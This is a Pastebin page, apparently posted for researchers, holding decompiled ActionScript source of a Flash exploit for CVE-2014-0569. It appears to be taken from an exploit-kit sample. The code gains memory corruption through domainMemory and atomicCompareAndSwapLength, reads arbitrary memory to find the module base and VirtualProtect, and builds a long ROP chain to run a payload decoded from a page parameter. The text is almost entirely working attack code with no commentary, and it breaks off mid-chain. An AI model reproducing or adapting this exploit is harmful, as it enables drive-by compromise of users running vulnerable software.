Advertisement
physicaldrive0

Exploit.SWF.CVE-2014-0569 Decoded Code

Dec 18th, 2014
1,188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.56 KB | None | 0 0
  1. @PhysicalDrive0
  2.  
  3. package {
  4. import flash.events.*;
  5. import flash.media.*;
  6. import flash.display.*;
  7. import flash.geom.*;
  8. import flash.utils.*;
  9. import flash.text.*;
  10. import flash.external.*;
  11. import flash.system.*;
  12. import flash.net.*;
  13. import __AS3__.vec.*;
  14. import avm2.intrinsics.memory.*;
  15.  
  16. public class aeryk extends Sprite {
  17.  
  18. private var mort5:Number;
  19. private var slotl:uint;
  20. private var larkr:uint = 233495534;
  21. private var crux1:uint = 200203949;
  22. private var whys3a:uint = 0x0800;
  23. private var orlyfx:Vector.<Object>;
  24. private var bios2t:Vector.<Object>;
  25. private var vola1:Sound;
  26. private var pokeg:ByteArray;
  27. private var magif:Vector.<Object>;
  28. private var rant2p:uint = 0;
  29. private var fray6u:Vector.<uint>;
  30. private var hugh1:uint;
  31. private var rugau8:uint;
  32. private var bonom:uint;
  33. private var gleeuo:uint;
  34. private var wombu3:uint;
  35. private var talis0:uint;
  36. private var dawnod:uint;
  37. private var fund2:uint;
  38. private var jump4:uint;
  39. private var dipseu:uint;
  40. private var buttkk:uint;
  41. private var modsj:uint;
  42. private var sobsft:uint;
  43.  
  44. public function aeryk(){
  45. var _loc2_:* = 0;
  46. this.orlyfx = new Vector.<Object>(this.whys3a);
  47. this.bios2t = new Vector.<Object>(this.whys3a);
  48. this.magif = new Vector.<Object>(this.whys3a);
  49. super();
  50. var _loc1_:* = this.loaderInfo.parameters.kosoz;
  51. if ((((_loc1_ == null)) || (!(this.pawn2c(116, 150))))){
  52. return;
  53. };
  54. this.vola1 = new Sound();
  55. this.pokeg = new ByteArray();
  56. this.pokeg.endian = Endian.LITTLE_ENDIAN;
  57. this.pokeg.length = 65536;
  58. this.birdzu();
  59. try {
  60. this.want2d(_loc1_);
  61. } catch(error:Error) {
  62. return;
  63. };
  64. this.pisa8();
  65. try {
  66. var _local2 = this.manei();
  67. _loc2_ = _local2;
  68. if (_local2 != 0){
  69. this.quodo0();
  70. return;
  71. };
  72. this.textline(1, "point4.5");
  73. _local2 = this.grity();
  74. _loc2_ = _local2;
  75. if (_local2 != 0){
  76. this.textline(1, "premature exit, 4.5");
  77. this.quodo0();
  78. return;
  79. };
  80. if (!(this.midin())){
  81. this.quodo0();
  82. return;
  83. };
  84. if (!(this.weilwk())){
  85. this.quodo0();
  86. return;
  87. };
  88. _local2 = this.modo55();
  89. _loc2_ = _local2;
  90. if (_local2 != 0){
  91. this.quodo0();
  92. return;
  93. };
  94. this.gadsi();
  95. this.kahncl();
  96. this.quodo0();
  97. } catch(error:Error) {
  98. textline(2, ((("errormsg: " + error.name) + " ") + error.message));
  99. return;
  100. };
  101. }
  102. public function textline(lnum:uint, text:String):void{
  103. }
  104. public function pawn2c(param1:Number, param2:Number):Boolean{
  105. var _loc3_:* = Capabilities.version.toLowerCase().split(" ");
  106. if (_loc3_[0] != "win"){
  107. return (false);
  108. };
  109. this.mort5 = Number(_loc3_[1].substr(0, 4).split(",").join(""));
  110. if ((((this.mort5 < param1)) && ((this.mort5 > param2)))){
  111. return (false);
  112. };
  113. return (true);
  114. }
  115. private function birdzu():void{
  116. this.slotl = 0x90909090;
  117. }
  118. public function hexdump(bytes:ByteArray, start:uint=1, length:uint=0):String{
  119. var byte:int;
  120. var output:String = "";
  121. var charbuf:String = "";
  122. if (start == 0){
  123. start = 1;
  124. };
  125. if ((((length > bytes.length)) || ((length == 0)))){
  126. length = bytes.length;
  127. };
  128. bytes.position = (start - 1);
  129. var i:int = start;
  130. while (i < (length + 1)) {
  131. byte = bytes.readByte();
  132. if ((((byte > 20)) && ((byte < 123)))){
  133. charbuf = (charbuf + String.fromCharCode(byte));
  134. } else {
  135. charbuf = (charbuf + ".");
  136. };
  137. output = (output + (this.byte2hex(byte) + " "));
  138. if ((i % 16) == 0){
  139. output = (output + (("\t" + charbuf) + "\n"));
  140. charbuf = "";
  141. };
  142. i++;
  143. };
  144. if ((i % 16) != 0){
  145. while ((i % 16) != 0) {
  146. output = (output + " ");
  147. i++;
  148. };
  149. output = (output + " ");
  150. output = (output + (("\t" + charbuf) + "\n"));
  151. };
  152. return (output);
  153. }
  154. public function byte2hex(byte:uint):String{
  155. var hex:String = "";
  156. var arr:String = "FEDCBA";
  157. var i:uint;
  158. while (i < 2) {
  159. if (((byte & (240 >> (i * 4))) >> (4 - (i * 4))) > 9){
  160. hex = (hex + arr.charAt((15 - ((byte & (240 >> (i * 4))) >> (4 - (i * 4))))));
  161. } else {
  162. hex = (hex + String(((byte & (240 >> (i * 4))) >> (4 - (i * 4)))));
  163. };
  164. i++;
  165. };
  166. return (hex);
  167. }
  168. private function want2d(param1:String):void{
  169. var _loc4_:uint;
  170. var _loc5_:uint;
  171. var _loc6_:* = 0;
  172. var _loc2_:* = "_w2fPjM9CaS1b-KWLkcpATG8IuelEJR7ovm3hndqQ5D6XUF0ztgONiyxYrsBV4ZH";
  173. this.pokeg.position = 1208;
  174. var _loc3_:uint;
  175. var n:ByteArray = new ByteArray();
  176. n.length = (param1.length + 1);
  177. while (_loc3_ < param1.length) {
  178. _loc4_ = 0;
  179. _loc5_ = 0;
  180. while (_loc5_ < 4) {
  181. _loc6_ = _loc2_.indexOf(param1.charAt((_loc3_ + _loc5_)));
  182. _loc6_ = (_loc6_ & 63);
  183. _loc4_ = (_loc4_ | (_loc6_ << ((3 - _loc5_) * 6)));
  184. _loc5_++;
  185. };
  186. _loc5_ = 0;
  187. while (_loc5_ < 3) {
  188. this.pokeg.writeByte(((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF));
  189. n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF);
  190. _loc5_++;
  191. };
  192. n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF);
  193. _loc3_ = (_loc3_ + 4);
  194. };
  195. this.textline(1, "try hexdump");
  196. this.textline(3, this.hexdump(this.pokeg, 1208, param1.length));
  197. this.textline(1, "try done");
  198. }
  199. private function pisa8():void{
  200. var _loc1_:ByteArray;
  201. var _loc2_:Vector.<uint>;
  202. var _loc3_:uint;
  203. _loc3_ = 0;
  204. while (_loc3_ < this.whys3a) {
  205. this.magif[_loc3_] = new Vector.<Object>();
  206. _loc3_++;
  207. };
  208. _loc3_ = 0;
  209. while (_loc3_ < this.whys3a) {
  210. this.bios2t[_loc3_] = new Vector.<uint>();
  211. _loc3_++;
  212. };
  213. _loc3_ = 0;
  214. while (_loc3_ < this.whys3a) {
  215. _loc2_ = (this.bios2t[_loc3_] as Vector.<uint>);
  216. _loc2_.length = 1022;
  217. _loc2_[0] = this.crux1;
  218. _loc2_[1] = _loc3_;
  219. _loc1_ = new ByteArray();
  220. _loc1_.length = 0x1000;
  221. _loc1_.endian = Endian.LITTLE_ENDIAN;
  222. _loc1_.position = 8;
  223. _loc1_.writeUnsignedInt(this.larkr);
  224. _loc1_.writeUnsignedInt(_loc3_);
  225. this.orlyfx[_loc3_] = _loc1_;
  226. _loc3_++;
  227. };
  228. }
  229. private function manei():uint{
  230. var pos:uint;
  231. var _loc2_:uint;
  232. var _loc3_:ByteArray;
  233. var _loc4_:Vector.<uint>;
  234. pos = uint((this.whys3a / 2));
  235. var startpos:uint = pos;
  236. while (pos < this.whys3a) {
  237. _loc3_ = (this.orlyfx[pos] as ByteArray);
  238. ApplicationDomain.currentDomain.domainMemory = _loc3_;
  239. _loc3_.atomicCompareAndSwapLength(0x1000, 0);
  240. if (casi32(0x1000, 1022, 0x40000001) == 1022){
  241. _loc2_ = (uint((this.whys3a / 2)) - 0x0100);
  242. while (_loc2_ < this.whys3a) {
  243. _loc4_ = (this.bios2t[_loc2_] as Vector.<uint>);
  244. if (_loc4_.length == 0x40000001){
  245. this.fray6u = _loc4_;
  246. return (0);
  247. };
  248. _loc2_++;
  249. };
  250. };
  251. pos++;
  252. };
  253. return (1);
  254. }
  255. private function quodo0():void{
  256. if (this.fray6u){
  257. if (((this.bonom) && (this.gleeuo))){
  258. this.sacs1y(this.bonom, this.gleeuo);
  259. };
  260. if (this.rugau8){
  261. this.fray6u[1073741823] = this.rugau8;
  262. };
  263. this.fray6u[1073741822] = 1022;
  264. } else {
  265. do {
  266. } while (1);
  267. };
  268. }
  269. public function fullk(param1:uint, param2:uint, param3:uint):uint{
  270. var _loc4_:uint = (param1 >>> (8 * param3));
  271. var _loc5_:uint = (((param3 == 0)) ? 0 : (param2 << ((4 - param3) * 8)));
  272. return ((_loc5_ | _loc4_));
  273. }
  274. public function intog(param1:uint):uint{
  275. var _loc2_:uint;
  276. var _loc3_:uint = (param1 % 4);
  277. param1 = (param1 - _loc3_);
  278. if (param1 >= this.hugh1){
  279. _loc2_ = (((param1 - this.hugh1) - 8) / 4);
  280. } else {
  281. _loc2_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4));
  282. };
  283. var _loc4_:uint = this.fray6u[_loc2_];
  284. if (_loc3_ == 0){
  285. return (_loc4_);
  286. };
  287. var _loc5_:uint = this.fray6u[(_loc2_ + 1)];
  288. return (this.fullk(_loc4_, _loc5_, _loc3_));
  289. }
  290. public function sacs1y(param1:uint, param2:uint):void{
  291. var _loc3_:uint;
  292. if (param1 >= this.hugh1){
  293. _loc3_ = (((param1 - this.hugh1) - 8) / 4);
  294. } else {
  295. _loc3_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4));
  296. };
  297. this.fray6u[_loc3_] = param2;
  298. }
  299. private function boobe():void{
  300. var _loc2_:Vector.<Object>;
  301. var _loc1_:uint;
  302. while ((((_loc1_ < 30)) && ((this.rant2p < this.whys3a)))) {
  303. _loc2_ = (this.magif[this.rant2p] as Vector.<Object>);
  304. _loc2_.length = 30;
  305. _loc2_[1] = this.vola1;
  306. _loc2_[2] = this.pokeg;
  307. this.rant2p++;
  308. _loc1_++;
  309. };
  310. }
  311. private function grity():uint{
  312. var _loc1_:uint;
  313. var _loc2_:uint;
  314. var _loc3_:uint;
  315. var _loc4_:ByteArray;
  316. var _loc5_:uint;
  317. var _loc6_:uint;
  318. var _loc7_:uint;
  319. _loc1_ = 1;
  320. while (_loc1_ < 16) {
  321. _loc2_ = (_loc1_ * 0x0400);
  322. if (((!(this.hugh1)) && ((this.fray6u[_loc2_] == this.larkr)))){
  323. _loc3_ = this.fray6u[(_loc2_ + 1)];
  324. _loc4_ = (this.orlyfx[_loc3_] as ByteArray);
  325. _loc4_.clear();
  326. _loc5_ = 0;
  327. while (this.fray6u[_loc2_] == this.larkr) {
  328. this.boobe();
  329. if (_loc5_ == 30){
  330. return (5);
  331. };
  332. _loc5_++;
  333. };
  334. if (((((!((this.fray6u[_loc2_] == this.larkr))) && ((this.fray6u[(((this.mort5 <= 111)) ? (_loc2_ + 2) : (_loc2_ - 1))] == 128)))) && (!(((_loc6_ = this.fray6u[(_loc2_ + 9)]) == 0))))){
  335. this.hugh1 = ((_loc6_ & 0xFFFFF000) - (_loc1_ * 0x1000));
  336. if (this.hugh1 < 65536){
  337. return (6);
  338. };
  339. if ((((((this.intog((_loc6_ + 4)) == 30)) && ((this.intog((_loc6_ + 8)) == 1)))) && ((this.intog((_loc6_ + 20)) == 1)))){
  340. this.bonom = (this.intog((_loc6_ + 12)) & 0xFFFFFFF8);
  341. this.gleeuo = this.intog(this.bonom);
  342. _loc7_ = (this.intog((_loc6_ + 16)) & 0xFFFFFFF8);
  343. if (this.mort5 < 114){
  344. this.wombu3 = this.intog((_loc7_ + 56));
  345. } else {
  346. _loc7_ = this.intog((_loc7_ + 64));
  347. this.wombu3 = this.intog((_loc7_ + 8));
  348. };
  349. } else {
  350. return (7);
  351. };
  352. };
  353. } else {
  354. if (((!(this.rugau8)) && ((this.fray6u[_loc2_] == this.crux1)))){
  355. this.rugau8 = this.fray6u[(_loc2_ - 1)];
  356. };
  357. };
  358. if (((this.hugh1) && (this.rugau8))){
  359. return (0);
  360. };
  361. _loc1_++;
  362. };
  363. if (((!(this.hugh1)) && (!(this.rugau8)))){
  364. return (1);
  365. };
  366. if (!(this.hugh1)){
  367. return (2);
  368. };
  369. if (!(this.rugau8)){
  370. return (3);
  371. };
  372. return (4);
  373. }
  374. public function midin():Boolean{
  375. var _loc1_:uint = (this.gleeuo & 0xFFFF0000);
  376. while ((this.intog(_loc1_) & 0xFFFF) != 23117) {
  377. _loc1_ = (_loc1_ - 65536);
  378. };
  379. this.talis0 = _loc1_;
  380. if (this.talis0){
  381. this.dawnod = (this.talis0 + this.intog((this.talis0 + 60)));
  382. if ((this.intog(this.dawnod) & 0xFFFF) == 17744){
  383. return (true);
  384. };
  385. };
  386. return (false);
  387. }
  388. public function weilwk():Boolean{
  389. var _loc3_:uint;
  390. var _loc4_:uint;
  391. var _loc5_:uint;
  392. var _loc6_:uint;
  393. var _loc7_:uint;
  394. var _loc8_:uint;
  395. var _loc1_:uint = this.intog((this.dawnod + 28));
  396. var _loc2_:uint = this.intog((this.dawnod + 44));
  397. if (((_loc1_) && (_loc2_))){
  398. _loc2_ = (_loc2_ + this.talis0);
  399. _loc3_ = this.intog(_loc2_);
  400. _loc4_ = 4;
  401. while (_loc4_ < _loc1_) {
  402. _loc5_ = this.intog((_loc2_ + _loc4_));
  403. _loc6_ = 0;
  404. while (_loc6_ < 4) {
  405. _loc7_ = this.fullk(_loc3_, _loc5_, _loc6_);
  406. _loc8_ = (_loc7_ & 0xFFFF);
  407. if (((!(this.fund2)) && ((_loc8_ == 50068)))){
  408. this.fund2 = (((_loc2_ + _loc4_) - 4) + _loc6_);
  409. };
  410. if (((!(this.jump4)) && ((_loc8_ == 50009)))){
  411. this.jump4 = (((_loc2_ + _loc4_) - 4) + _loc6_);
  412. };
  413. if (((!(this.dipseu)) && ((_loc8_ == 49992)))){
  414. this.dipseu = (((_loc2_ + _loc4_) - 4) + _loc6_);
  415. };
  416. if (((!(this.modsj)) && ((_loc8_ == 50000)))){
  417. this.modsj = (((_loc2_ + _loc4_) - 4) + _loc6_);
  418. };
  419. if (((!(this.buttkk)) && ((_loc7_ == 3277654153)))){
  420. this.buttkk = (((_loc2_ + _loc4_) - 4) + _loc6_);
  421. };
  422. _loc6_++;
  423. };
  424. _loc3_ = _loc5_;
  425. if (((((((((this.fund2) && (this.jump4))) && (this.dipseu))) && (this.buttkk))) && (this.modsj))){
  426. return (true);
  427. };
  428. _loc4_ = (_loc4_ + 4);
  429. };
  430. };
  431. return (false);
  432. }
  433. public function modo55():uint{
  434. var _loc2_:uint;
  435. var _loc3_:uint;
  436. var _loc4_:uint;
  437. var _loc5_:uint;
  438. var _loc6_:uint;
  439. var _loc7_:uint;
  440. var _loc1_:uint = (this.talis0 + this.intog((this.dawnod + 128)));
  441. while (true) {
  442. _loc2_ = this.intog(_loc1_);
  443. if (_loc2_ == 0){
  444. break;
  445. };
  446. _loc3_ = (this.talis0 + this.intog((_loc1_ + 12)));
  447. if (((((this.intog(_loc3_) & 1314014539) == 1314014539)) && (((this.intog((_loc3_ + 4)) & 842222661) == 842222661)))){
  448. _loc4_ = 0;
  449. _loc2_ = (_loc2_ + this.talis0);
  450. while (true) {
  451. _loc5_ = this.intog(_loc2_);
  452. if (_loc5_ == 0){
  453. break;
  454. };
  455. _loc6_ = ((this.talis0 + _loc5_) + 2);
  456. if ((((((this.intog(_loc6_) == 1953655126)) && ((this.intog((_loc6_ + 4)) == 1097621877)))) && ((this.intog((_loc6_ + 8)) == 1668246636)))){
  457. _loc7_ = (this.talis0 + this.intog((_loc1_ + 16)));
  458. this.sobsft = this.intog((_loc7_ + (_loc4_ * 4)));
  459. return ((((this.sobsft == 0)) ? 4 : 0));
  460. };
  461. _loc2_ = (_loc2_ + 4);
  462. _loc4_++;
  463. };
  464. return (3);
  465. };
  466. _loc1_ = (_loc1_ + 20);
  467. };
  468. return (2);
  469. }
  470. private function gadsi():void{
  471. this.pokeg.position = 0;
  472. var _loc1_:uint;
  473. while (_loc1_ < 27) {
  474. this.pokeg.writeUnsignedInt((this.jump4 + 1));
  475. _loc1_++;
  476. };
  477. this.pokeg.writeUnsignedInt(this.jump4);
  478. this.pokeg.writeUnsignedInt(this.fund2);
  479. this.pokeg.writeUnsignedInt(this.dipseu);
  480. this.pokeg.writeUnsignedInt(this.dipseu);
  481. this.pokeg.writeUnsignedInt(this.dipseu);
  482. this.pokeg.writeUnsignedInt(this.dipseu);
  483. this.pokeg.writeUnsignedInt(this.jump4);
  484. this.pokeg.writeUnsignedInt(this.modsj);
  485. this.pokeg.writeUnsignedInt(this.buttkk);
  486. this.pokeg.writeUnsignedInt(0x41414141);
  487. this.pokeg.writeUnsignedInt(this.dipseu);
  488. this.pokeg.writeUnsignedInt(this.dipseu);
  489. this.pokeg.writeUnsignedInt(this.dipseu);
  490. this.pokeg.writeUnsignedInt(this.dipseu);
  491. this.pokeg.writeUnsignedInt(this.jump4);
  492. this.pokeg.writeUnsignedInt(this.slotl);
  493. this.pokeg.writeUnsignedInt(this.buttkk);
  494. this.pokeg.writeUnsignedInt(0x41414141);
  495. this.pokeg.writeUnsignedInt(this.dipseu);
  496. this.pokeg.writeUnsignedInt(this.dipseu);
  497. this.pokeg.writeUnsignedInt(this.dipseu);
  498. this.pokeg.writeUnsignedInt(this.dipseu);
  499. this.pokeg.writeUnsignedInt(this.jump4);
  500. this.pokeg.writeUnsignedInt(this.jump4);
  501. this.pokeg.writeUnsignedInt(this.buttkk);
  502. this.pokeg.writeUnsignedInt(0x41414141);
  503. this.pokeg.writeUnsignedInt(this.dipseu);
  504. this.pokeg.writeUnsignedInt(this.dipseu);
  505. this.pokeg.writeUnsignedInt(this.dipseu);
  506. this.pokeg.writeUnsignedInt(this.dipseu);
  507. this.pokeg.writeUnsignedInt(this.jump4);
  508. this.pokeg.writeUnsignedInt((this.wombu3 + 1208));
  509. this.pokeg.writeUnsignedInt(this.buttkk);
  510. this.pokeg.writeUnsignedInt(0x41414141);
  511. this.pokeg.writeUnsignedInt(this.dipseu);
  512. this.pokeg.writeUnsignedInt(this.dipseu);
  513. this.pokeg.writeUnsignedInt(this.dipseu);
  514. this.pokeg.writeUnsignedInt(this.dipseu);
  515. this.pokeg.writeUnsignedInt(this.jump4);
  516. this.pokeg.writeUnsignedInt(this.buttkk);
  517. this.pokeg.writeUnsignedInt(this.buttkk);
  518. this.pokeg.writeUnsignedInt(0x41414141);
  519. this.pokeg.writeUnsignedInt(this.dipseu);
  520. this.pokeg.writeUnsignedInt(this.dipseu);
  521. this.pokeg.writeUnsignedInt(this.dipseu);
  522. this.pokeg.writeUnsignedInt(this.dipseu);
  523. this.pokeg.writeUnsignedInt(this.jump4);
  524. this.pokeg.writeUnsignedInt(276335968);
  525. this.pokeg.writeUnsignedInt(this.buttkk);
  526. this.pokeg.writeUnsignedInt(0x41414141);
  527. this.pokeg.writeUnsignedInt(this.dipseu);
  528. this.pokeg.writeUnsignedInt(this.dipseu);
  529. this.pokeg.writeUnsignedInt(this.dipseu);
  530. this.pokeg.writeUnsignedInt(this.dipseu);
  531. this.pokeg.writeUnsignedInt(this.jump4);
  532. this.pokeg.writeUnsignedInt(this.jump4);
  533. this.pokeg.writeUnsignedInt(this.buttkk);
  534. this.pokeg.writeUnsignedInt(0x41414141);
  535. this.pokeg.writeUnsignedInt(this.dipseu);
  536. this.pokeg.writeUnsignedInt(this.dipseu);
  537. this.pokeg.writeUnsignedInt(this.dipseu);
  538. this.pokeg.writeUnsignedInt(this.dipseu);
  539. this.pokeg.writeUnsignedInt(this.jump4);
  540. this.pokeg.writeUnsignedInt(this.modsj);
  541. this.pokeg.writeUnsignedInt(this.buttkk);
  542. this.pokeg.writeUnsignedInt(0x41414141);
  543. this.pokeg.writeUnsignedInt(this.dipseu);
  544. this.pokeg.writeUnsignedInt(this.dipseu);
  545. this.pokeg.writeUnsignedInt(this.dipseu);
  546. this.pokeg.writeUnsignedInt(this.dipseu);
  547. this.pokeg.writeUnsignedInt(this.jump4);
  548. this.pokeg.writeUnsignedInt(3242323591);
  549. this.pokeg.writeUnsignedInt(this.buttkk);
  550. this.pokeg.writeUnsignedInt(0x41414141);
  551. this.pokeg.writeUnsignedInt(this.dipseu);
  552. this.pokeg.writeUnsignedInt(this.dipseu);
  553. this.pokeg.writeUnsignedInt(this.dipseu);
  554. this.pokeg.writeUnsignedInt(this.dipseu);
  555. this.pokeg.writeUnsignedInt(this.jump4);
  556. this.pokeg.writeUnsignedInt(this.jump4);
  557. this.pokeg.writeUnsignedInt(this.buttkk);
  558. this.pokeg.writeUnsignedInt(0x41414141);
  559. this.pokeg.writeUnsignedInt(this.dipseu);
  560. this.pokeg.writeUnsignedInt(this.dipseu);
  561. this.pokeg.writeUnsignedInt(this.dipseu);
  562. this.pokeg.writeUnsignedInt(this.dipseu);
  563. this.pokeg.writeUnsignedInt(this.jump4);
  564. this.pokeg.writeUnsignedInt(0x41414141);
  565. this.pokeg.writeUnsignedInt(this.buttkk);
  566. this.pokeg.writeUnsignedInt(0x41414141);
  567. this.pokeg.writeUnsignedInt(this.dipseu);
  568. this.pokeg.writeUnsignedInt(this.dipseu);
  569. this.pokeg.writeUnsignedInt(this.dipseu);
  570. this.pokeg.writeUnsignedInt(this.dipseu);
  571. this.pokeg.writeUnsignedInt(this.jump4);
  572. this.pokeg.writeUnsignedInt(this.buttkk);
  573. this.pokeg.writeUnsignedInt(this.buttkk);
  574. this.pokeg.writeUnsignedInt(0x41414141);
  575. this.pokeg.writeUnsignedInt(this.dipseu);
  576. this.pokeg.writeUnsignedInt(this.dipseu);
  577. this.pokeg.writeUnsignedInt(this.dipseu);
  578. this.pokeg.writeUnsignedInt(this.dipseu);
  579. this.pokeg.writeUnsignedInt(this.jump4);
  580. this.pokeg.writeUnsignedInt(3271837833);
  581. this.pokeg.writeUnsignedInt(this.buttkk);
  582. this.pokeg.writeUnsignedInt(0x41414141);
  583. this.pokeg.writeUnsignedInt(this.dipseu);
  584. this.pokeg.writeUnsignedInt(this.dipseu);
  585. this.pokeg.writeUnsignedInt(this.dipseu);
  586. this.pokeg.writeUnsignedInt(this.dipseu);
  587. this.pokeg.writeUnsignedInt(this.jump4);
  588. this.pokeg.writeUnsignedInt(this.jump4);
  589. this.pokeg.writeUnsignedInt(this.buttkk);
  590. this.pokeg.writeUnsignedInt(0x41414141);
  591. this.pokeg.writeUnsignedInt(this.dipseu);
  592. this.pokeg.writeUnsignedInt(this.dipseu);
  593. this.pokeg.writeUnsignedInt(this.dipseu);
  594. this.pokeg.writeUnsignedInt(this.dipseu);
  595. this.pokeg.writeUnsignedInt(this.jump4);
  596. this.pokeg.writeUnsignedInt(this.modsj);
  597. this.pokeg.writeUnsignedInt(this.buttkk);
  598. this.pokeg.writeUnsignedInt(0x41414141);
  599. this.pokeg.writeUnsignedInt(this.dipseu);
  600. this.pokeg.writeUnsignedInt(this.dipseu);
  601. this.pokeg.writeUnsignedInt(this.dipseu);
  602. this.pokeg.writeUnsignedInt(this.dipseu);
  603. this.pokeg.writeUnsignedInt(this.jump4);
  604. this.pokeg.writeUnsignedInt(833423561);
  605. this.pokeg.writeUnsignedInt(this.buttkk);
  606. this.pokeg.writeUnsignedInt(0x41414141);
  607. this.pokeg.writeUnsignedInt(this.dipseu);
  608. this.pokeg.writeUnsignedInt(this.dipseu);
  609. this.pokeg.writeUnsignedInt(this.dipseu);
  610. this.pokeg.writeUnsignedInt(this.dipseu);
  611. this.pokeg.writeUnsignedInt(this.jump4);
  612. this.pokeg.writeUnsignedInt(this.jump4);
  613. this.pokeg.writeUnsignedInt(this.buttkk);
  614. this.pokeg.writeUnsignedInt(0x41414141);
  615. this.pokeg.writeUnsignedInt(this.dipseu);
  616. this.pokeg.writeUnsignedInt(this.dipseu);
  617. this.pokeg.writeUnsignedInt(this.dipseu);
  618. this.pokeg.writeUnsignedInt(this.dipseu);
  619. this.pokeg.writeUnsignedInt(this.jump4);
  620. this.pokeg.writeUnsignedInt(0x41414141);
  621. this.pokeg.writeUnsignedInt(this.buttkk);
  622. this.pokeg.writeUnsignedInt(0x41414141);
  623. this.pokeg.writeUnsignedInt(this.dipseu);
  624. this.pokeg.writeUnsignedInt(this.dipseu);
  625. this.pokeg.writeUnsignedInt(this.dipseu);
  626. this.pokeg.writeUnsignedInt(this.dipseu);
  627. this.pokeg.writeUnsignedInt(this.jump4);
  628. this.pokeg.writeUnsignedInt(this.buttkk);
  629. this.pokeg.writeUnsignedInt(this.buttkk);
  630. this.pokeg.writeUnsignedInt(0x41414141);
  631. this.pokeg.writeUnsignedInt(this.dipseu);
  632. this.pokeg.writeUnsignedInt(this.dipseu);
  633. this.pokeg.writeUnsignedInt(this.dipseu);
  634. this.pokeg.writeUnsignedInt(this.dipseu);
  635. this.pokeg.writeUnsignedInt(this.jump4);
  636. this.pokeg.writeUnsignedInt(3272099977);
  637. this.pokeg.writeUnsignedInt(this.buttkk);
  638. this.pokeg.writeUnsignedInt(0x41414141);
  639. this.pokeg.writeUnsignedInt(this.dipseu);
  640. this.pokeg.writeUnsignedInt(this.dipseu);
  641. this.pokeg.writeUnsignedInt(this.dipseu);
  642. this.pokeg.writeUnsignedInt(this.dipseu);
  643. this.pokeg.writeUnsignedInt(this.jump4);
  644. this.pokeg.writeUnsignedInt(this.jump4);
  645. this.pokeg.writeUnsignedInt(this.buttkk);
  646. this.pokeg.writeUnsignedInt(0x41414141);
  647. this.pokeg.writeUnsignedInt(this.dipseu);
  648. this.pokeg.writeUnsignedInt(this.dipseu);
  649. this.pokeg.writeUnsignedInt(this.dipseu);
  650. this.pokeg.writeUnsignedInt(this.dipseu);
  651. this.pokeg.writeUnsignedInt(this.jump4);
  652. this.pokeg.writeUnsignedInt(this.modsj);
  653. this.pokeg.writeUnsignedInt(this.buttkk);
  654. this.pokeg.writeUnsignedInt(0x41414141);
  655. this.pokeg.writeUnsignedInt(this.dipseu);
  656. this.pokeg.writeUnsignedInt(this.dipseu);
  657. this.pokeg.writeUnsignedInt(this.dipseu);
  658. this.pokeg.writeUnsignedInt(this.dipseu);
  659. this.pokeg.writeUnsignedInt(this.jump4);
  660. this.pokeg.writeUnsignedInt(4134906824);
  661. this.pokeg.writeUnsignedInt(this.buttkk);
  662. this.pokeg.writeUnsignedInt(0x41414141);
  663. this.pokeg.writeUnsignedInt(this.dipseu);
  664. this.pokeg.writeUnsignedInt(this.dipseu);
  665. this.pokeg.writeUnsignedInt(this.dipseu);
  666. this.pokeg.writeUnsignedInt(this.dipseu);
  667. this.pokeg.writeUnsignedInt(this.jump4);
  668. this.pokeg.writeUnsignedInt(this.jump4);
  669. this.pokeg.writeUnsignedInt(this.buttkk);
  670. this.pokeg.writeUnsignedInt(0x41414141);
  671. this.pokeg.writeUnsignedInt(this.dipseu);
  672. this.pokeg.writeUnsignedInt(this.dipseu);
  673. this.pokeg.writeUnsignedInt(this.dipseu);
  674. this.pokeg.writeUnsignedInt(this.dipseu);
  675. this.pokeg.writeUnsignedInt(this.jump4);
  676. this.pokeg.writeUnsignedInt(0x41414141);
  677. this.pokeg.writeUnsignedInt(this.buttkk);
  678. this.pokeg.writeUnsignedInt(0x41414141);
  679. this.pokeg.writeUnsignedInt(this.dipseu);
  680. this.pokeg.writeUnsignedInt(this.dipseu);
  681. this.pokeg.writeUnsignedInt(this.dipseu);
  682. this.pokeg.writeUnsignedInt(this.dipseu);
  683. this.pokeg.writeUnsignedInt(this.jump4);
  684. this.pokeg.writeUnsignedInt(this.buttkk);
  685. this.pokeg.writeUnsignedInt(this.buttkk);
  686. this.pokeg.writeUnsignedInt(0x41414141);
  687. this.pokeg.writeUnsignedInt(this.dipseu);
  688. this.pokeg.writeUnsignedInt(this.dipseu);
  689. this.pokeg.writeUnsignedInt(this.dipseu);
  690. this.pokeg.writeUnsignedInt(this.dipseu);
  691. this.pokeg.writeUnsignedInt(this.jump4);
  692. this.pokeg.writeUnsignedInt(3272362121);
  693. this.pokeg.writeUnsignedInt(this.buttkk);
  694. this.pokeg.writeUnsignedInt(0x41414141);
  695. this.pokeg.writeUnsignedInt(this.dipseu);
  696. this.pokeg.writeUnsignedInt(this.dipseu);
  697. this.pokeg.writeUnsignedInt(this.dipseu);
  698. this.pokeg.writeUnsignedInt(this.dipseu);
  699. this.pokeg.writeUnsignedInt(this.jump4);
  700. this.pokeg.writeUnsignedInt(this.jump4);
  701. this.pokeg.writeUnsignedInt(this.buttkk);
  702. this.pokeg.writeUnsignedInt(0x41414141);
  703. this.pokeg.writeUnsignedInt(this.dipseu);
  704. this.pokeg.writeUnsignedInt(this.dipseu);
  705. this.pokeg.writeUnsignedInt(this.dipseu);
  706. this.pokeg.writeUnsignedInt(this.dipseu);
  707. this.pokeg.writeUnsignedInt(this.jump4);
  708. this.pokeg.writeUnsignedInt(64);
  709. this.pokeg.writeUnsignedInt(this.buttkk);
  710. this.pokeg.writeUnsignedInt(0x41414141);
  711. this.pokeg.writeUnsignedInt(this.dipseu);
  712. this.pokeg.writeUnsignedInt(this.dipseu);
  713. this.pokeg.writeUnsignedInt(this.dipseu);
  714. this.pokeg.writeUnsignedInt(this.dipseu);
  715. this.pokeg.writeUnsignedInt(this.jump4);
  716. this.pokeg.writeUnsignedInt(0x1000);
  717. this.pokeg.writeUnsignedInt(this.buttkk);
  718. this.pokeg.writeUnsignedInt(0x41414141);
  719. this.pokeg.writeUnsignedInt(this.dipseu);
  720. this.pokeg.writeUnsignedInt(this.dipseu);
  721. this.pokeg.writeUnsignedInt(this.dipseu);
  722. this.pokeg.writeUnsignedInt(this.dipseu);
